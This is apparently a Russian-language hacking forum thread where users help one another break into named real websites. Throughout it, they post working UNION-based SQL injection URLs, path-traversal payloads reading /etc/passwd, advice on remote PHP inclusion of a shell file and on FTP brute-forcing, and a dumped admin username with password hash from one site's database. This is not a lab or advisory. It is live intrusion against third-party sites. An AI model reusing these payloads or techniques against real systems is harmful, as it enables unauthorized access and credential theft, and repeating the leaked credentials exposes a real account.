1.Гы))Вбивай кавычки везде ))) 2.Ini_get() 3.phpinfo() 4.Мб CVS на сервере дежурит. 5.Поискать инклуд или sql и попробывать прочесть файл. 6.Поглядеть исходники 7.Посмотреть в Гугле описание директивы mysql_quotes_gpc и не задавать этот вопрос снова
Вот... Code: http://trophymanager.com/klubhus.php?showclub=1+and+1=0+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14--
http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 http://hl-online.ru/photos/admin.php http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world что можно с этим добром сделать ? как дальше пройти?
Брутить ФТП или как вариант почитать сорцы конфигов движка с целью доступа к БД или мб к панели администратора
Чего-то я там не вижу php-include. Может прикрыли уже? Но как вариант было найти реальный путь, и инклюдить файлы, начиная с index'a и дойдя так до БД слогами, но надо, что бы там было читалка. Можно было провести удаленный php-include, т.е. file.php?a=http://site.ru/shell.txt. Желательно именно *.txt, потому что не всегда можно *.php заливать и не факт, что сработает, а так любой файл даже *.txt все-ровно принимается как *.php!
http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20-- Помогите плиз, вобщем вывел таблицы через Group_concat но они не все выводяться, а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...
А где написано, что они должны все выводиться? Да, иногда ошибку даёт, не в лимите дело, он и без него иногда ничего не выводит. Но в любом случае вывести можно, там 346 таблиц, несколько раз делай запрос , до вывода, других способов всё равно нет
Зачем через group_concat? Делай просто через limit по одному. http://www.rapidshare.ru/909903 - вот тебе список всех таблиц! Самые полезные: user и mybb_users http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_schema.columns+where+table_name=0x75736572++-- это колонки таблицы user http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_schema.columns+where+table_name=0x6d7962625f7573657273++-- колонки таблицы mybb_users http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,concat_ws(0x3a,uid,username,password)+from+mybb_users-- 1:Admin:5d3fd0aa8e2c38d1b632a1a2d09f46dd - вот логин и пароль из таблицы mybb_users
https://forum.antichat.ru/showpost.php?p=1075672&postcount=4940 Есть еще знак > и < и т.д. Лимит не везде доступен при скулях
Pashkela Не понял. Ты отвечал на какой-то мой вопрос? Если на этот --> А где написано, что они должны все выводиться? То ответа по ссылке на нашол, да и не стоит беспокоится, вопрос риторический Насчёт лимита: Там работает лимит, просто скрипт глючит иногда.
как это у вас проходят конструкции group_concat+limit, я думал функции с аргументами выборки не дружат с лимитом, на вашем же примере если задавать начальные позиции <>0 вот ещё 1 пример, вывод есть: вывода нет и чем вас не устраивает вариант group_concat(user order by 'user') where user>'user' ? '(
Какой ещё group_concat+limit? Лично я говорил про лимит отдельно, груп конкат отдельно. Возможно не достаточно понятно выразился, извиняйте. Я тебе уже говорил, что подзапросы и условия-- это не наш метод, нам нужна кнопка "Залить шелл" =========================== add: кстати о проститутках, их можно группировать Например так(разбиваем по базам): http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+information_schema.tables+group+by+table_schema+limit+2,1--+ При таком раскладе лимит ,разумеется, работает отлично Ну а не на information_schema, тоже можно групировать по полю, админов там всех вывести и т.д Типо: -1+union+select+group_concat(concat_ws(0x2f,user,password,file_priv)),2,3,4,5,6+from+mysql.user+group+by+file_priv+limit+1,1 Ну и т.д., тоже конечно не панацея, но как вариант покатит
У меня такой вопрос, подобрал например в скуле количество выводимых полей, конструкция такого типа выводит данные -1+group+by+1, но как только делаю union даные не выводятся, вот сылка HTML: http://www2.cali.org/index.php?fuseaction=conference.ViewAgenda&eventid=-1+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/* Как я понял нужно делать через сабгверю?
Как он принимается за пхп,если не обрабатывается интерпретатором,если ток не указано в httpd.conf его обрабатывать как пхп сценарий.Или ты имеешь ввиду,что можно залить любой тхт файл ?
Велемир ты разницу между заливкой и инклудом видишь? При инклуде расширение не играет роли, любой файл можно включить и он обработается Tigger прав.
Видимо нет =\ http://php.su/functions/?include http://php.su/functions/?require Это не заливка, а ВКЛЮЧЕНИЕ
